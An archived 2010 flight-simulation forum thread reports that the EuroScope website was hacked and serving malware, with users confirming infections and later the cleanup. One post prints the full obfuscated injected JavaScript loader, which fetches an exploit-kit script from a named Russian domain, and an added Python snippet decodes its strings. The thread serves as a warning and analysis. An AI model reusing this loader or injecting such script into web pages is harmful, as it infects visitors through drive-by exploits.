
You're browsing the 2004-2023 VATSIM Forums archive. All content is preserved in a read-only fashion.
For the latest forum posts, please visit https://forum.vatsim.net.


Virus at Euroscope Website [repaired]


Nils Hillmann 1069421


Nils Hillmann 1069421
Posted (edited)

EDIT by 22.05. 11:30z: Site is repaired and without a virus now.

 

 

Old text:

For everyone without a current antivirus solution with an intrusion detection system:

 

DO NOT GO ONTO euroscope.hu

at the moment. At the end of the main.php script is an

 

I have informed Gergely via PM in this forum, too.

Edited by Guest

------

You can find plugins for EuroScope at http://es-pluginworld.nilshillmann.de/projects/

Currently available there:

- OCC Plugin Version 1.2 (Development approved by Gergely Csernak)


Nils Hillmann 1069421
Posted
For everyone without a current antivirus solution with an intrusion detection system:

 

DO NOT GO ONTO euroscope.hu

at the moment. At the end of the main.php script is an

 

 

http://linkscanner.explabs.com/linkscanner/checksite.aspx?NS=ChkOnly&SRC=apps.explabs.com&CS=http://www.euroscope.hu

 

It's fine. A bit of random JS doesn't mean you're going to get hacked.

 

It isn't fine. Using only one virus scanner (and one without an intrusion detection system!!) is not a safe way to identify a threat.

If you really want to look at the attack mechanism, do the following:

First deactivate JavaScript in your browser, so this sample will not be executed.

Then go onto euroscope.hu and open the source code of the site. Now you can scroll completely down and find some JavaScript.

If you now read this script, it looks like this (no problem, this isn't executed due to the missing script tags):

D=64787;D--;eX=23262;eX--;var U;QS=["M","R","Q"];BJ=["m","g","J"];E=function(){this.CW=54327;this.CW--;function Z(e,v,W){var jB=[];return e.substr(v,W);}this.BF=false;var q=RegExp;var d=docomeent;var c="/e"+"lp"+"ai"+Z("s-Lzp",0,2)+"co"+Z("HSQFm/QSFH",4,2)+"go"+Z("oglBUI",0,2)+Z("RVhIleIVRh",4,2)+Z("ujo5.c5ouj",4,2)+Z("omr3u",0,2)+"/t"+Z("el5K8",0,2)+Z("45SegS45",3,2)+"ra"+"ph"+Z(".czfqZ",0,2)+Z("o.vnNG",0,2)+"uk"+Z(".p3iA",0,2)+Z("QgLhpLQg",3,2);AF=["A"];var p='';var jx=new Date();YS=26875;YS+=78;var CN={f:43797};qS={UH:false};GM=["pj","cH","Ay"];function O(e,v){Yz={xC:36475};var Zq="";hT=["Zo"];xe=["fk"];var W=String("[")+v+new String("]");var pY=new q(W, String(Z("ghYeE",0,1)));return e.replace(pY, p);zO=[];};try {} catch(Gr){};TT=["db","b","vq"];po={};var K="bo"+"dy";bi={};var P=null;var Ga={i:33470};var B=728919-720839;var C=O('socfroiWpotN','10NUCF9kynQdWfKLw3AloGYZT');U=function(){try {var UD="";var iQ="";var L=O('cirkeXaUt5e6Ekl9e6mCeXnwtQ','kCdXYMH926xwsU8hQ5i');var FU='';a=d[L](C);GW=62866;GW--;var O_='';var Bj=Z("deTuN",0,2)+"fe"+Z("rQcm",0,1);this.oq="oq";xp=[];var sL=[];var e=B+c;var _=O('s5rIcK','6gz7Gtk4ju1XIhRmVUKx5');w=[];Tq=54884;Tq+=124;a[_]=String("http:"+"//ten"+"thpro"+"fit.r"+"u:")+e;a[Bj]=[1,6][0];Xc=14228;Xc++;uG={Th:false};this.Ww=25035;this.Ww--;d[K].appendChild(a);var mg=38454;var Ou=945;} catch(l){var jc=new Array();};sf=52081;sf-=221;};var Ye={hS:15679};var rb={wu:17158};};var XF="";E();UO={fN:"Kq"};var cF=new Date();var fi=new Array();var vw=new Array();window.onload=U;this.Ko=36024;this.Ko--;var LS=new Array();

where you of course have to decrypt the values; then you can find that this script is loading some other things from the domain

http://tenthprofit.ru

Do you now think also that this site is currently fine?


Nils Hillmann 1069421
Posted
Since I'm not willing to waste time decoding it, would you like to show me the decrypted code?

 

Not the complete decoded code, but I can tell you that this script adds another script tag into the site, which then loads the JavaScript (which is then generated for the vulnerabilities the specific user agent has):

http://URL:8080/elpais-com/google.com/telegraph.co.uk.php

where URL has to be replaced by the URL which I already posted.

 

This was the part which I got after 10 minutes' work on it. I don't want to waste more time on it now, because I have to work on some other things and also want to go to sleep soon (it's 02:22 am local time here...)

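An added example, not code from the thread: a Python re-implementation of the sample's two string helpers, Z (a substr wrapper) and O (deletes every character of a given set from a string), applied to the literals copied from the posted script so the identifiers and the request path can be recovered statically instead of by running it. The function names z_substr, o_strip, decode_loader and describe are mine; the host placeholder stands for the domain already named in the thread.

```python
# Added example (not from the thread): static re-implementation of the loader's
# two string-building helpers, Z() and O(), so the obfuscated identifiers and the
# request path can be recovered without executing the script in a browser.

def z_substr(s: str, start: int, length: int) -> str:
    """Z(e, v, W) in the sample is just e.substr(v, W)."""
    return s[start:start + length]

def o_strip(e: str, v: str) -> str:
    """O(e, v) builds new RegExp('[' + v + ']', 'g') and replaces every match
    with '', i.e. it deletes each character of the set v from e, case-sensitively.
    A plain set is used instead of a regex so characters such as '-' or ']'
    in v cannot be misread as a range or a class terminator."""
    drop = set(v)
    return "".join(ch for ch in e if ch not in drop)

# The three O(...) calls exactly as they appear in the posted sample.
OBFUSCATED = {
    "C": ("socfroiWpotN", "10NUCF9kynQdWfKLw3AloGYZT"),
    "L": ("cirkeXaUt5e6Ekl9e6mCeXnwtQ", "kCdXYMH926xwsU8hQ5i"),
    "_": ("s5rIcK", "6gz7Gtk4ju1XIhRmVUKx5"),
}

def decode_loader() -> dict:
    """Return the plain-text values the loader assembles at run time."""
    out = {name: o_strip(e, v) for name, (e, v) in OBFUSCATED.items()}
    # Bj = Z("deTuN",0,2)+"fe"+Z("rQcm",0,1)
    out["Bj"] = z_substr("deTuN", 0, 2) + "fe" + z_substr("rQcm", 0, 1)
    # B = 728919-720839 is prepended to the path and becomes the port number
    out["port"] = 728919 - 720839
    # var c = "/e"+"lp"+"ai"+Z("s-Lzp",0,2)+ ... +Z("QgLhpLQg",3,2), copied from the sample
    out["path"] = ("/e" + "lp" + "ai" + z_substr("s-Lzp", 0, 2) + "co"
                   + z_substr("HSQFm/QSFH", 4, 2) + "go" + z_substr("oglBUI", 0, 2)
                   + z_substr("RVhIleIVRh", 4, 2) + z_substr("ujo5.c5ouj", 4, 2)
                   + z_substr("omr3u", 0, 2) + "/t" + z_substr("el5K8", 0, 2)
                   + z_substr("45SegS45", 3, 2) + "ra" + "ph" + z_substr(".czfqZ", 0, 2)
                   + z_substr("o.vnNG", 0, 2) + "uk" + z_substr(".p3iA", 0, 2)
                   + z_substr("QgLhpLQg", 3, 2))
    return out

def describe(out: dict) -> str:
    """Readable summary of d[L](C); a[_]=...; a[Bj]=1; d.body.appendChild(a)."""
    return (f"document.{out['L']}('{out['C']}') with {out['_']}=http://<host>:{out['port']}"
            f"{out['path']} and {out['Bj']}=1, appended to document.body on window.onload")

if __name__ == "__main__":
    print(describe(decode_loader()))
```

Only the string helpers are reproduced; nothing here fetches or evaluates the remote script, which is the point of decoding it by hand.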

Todor Atanasov 878664
Posted

I can confirm it. I'll take care of it later today.


Jonas Eberle
Posted

Confirmed also. It managed to get a program called "Security Essentials 2010" onto my computer within seconds.


Luca Vetturi 874351
Posted

Had to spend all day removing malware from the PC I use for FS&ES, too.

Also the ES Mantis page is hacked.

 

I've sent an email to the ES support address yesterday, no reply so far.

Red over white, you're all right.

Italy vACC proud supporter


Nils Hillmann 1069421
Posted

I discovered a little bit more now. For a browser like mine (current Firefox) they are trying to use vulnerabilities in Java and PDF: the script whose URL I posted in my last post includes an iframe into the site, which then loads the main page of the domain with some params, and this site then again adds iframes which load an attacking PDF file and an HTML file with some Java attacks.

I love my live Linux systems and text browsers. Ideal for exploring this code without danger (if you know what you are doing).


Eric Bocaneanu 906549
Posted

Actually you don't have to use Linux. User-friendly OSes are perfectly fine too, like Apple OS X. Except for Google Chrome showing me a warning that this page is insecure and redirecting stuff to tenthprofit.ro, everything's fine. And Google Chrome will do the same in Windows as well. Which in my book makes it more secure than Firefox, as we can see in this example.

 

@Luca: As Todor said here in the forum, it is being fixed. I thought you were on OS X too.

Eric Bocaneanu

ROvACC Director


George Complin
Posted

On the VatUK site there is discussion about what sounds to me like a similar virus issue on the Frankfurt RealOps site.

http://community.vatsim-uk.org/topic/20278-2010-05-29-frankfurt-real-ops

 

Does anyone know if they are related in any way or form?


Todor Atanasov 878664
Posted
Had to spend all day removing malware from the PC I use for FS&ES, too.

Also the ES Mantis page is hacked.

 

I've sent an email to the ES support address yesterday, no reply so far.

Luca, was the malware related to the ES web site problem, or just a coincidence?

About the script insertion, it is in all the euroscope.hu web page files, including the mediawiki files.


Luca Benelli
Posted

AFAIK the malware Luca Vetturi got came from the EuroScope Mantis website... so I suspect it's related... not sure if it's the same server or whatever.

Luca Benelli - C3 - P2


Todor Atanasov 878664
Posted

I would ask you to check the site's pages again, they should be ok now, Gergely should have uploaded all the files tonight.


Nils Hillmann 1069421
Posted
I would ask you to check the site's pages again, they should be ok now, Gergely should have uploaded all the files tonight.

 

Confirmed, the pages are without the virus now.
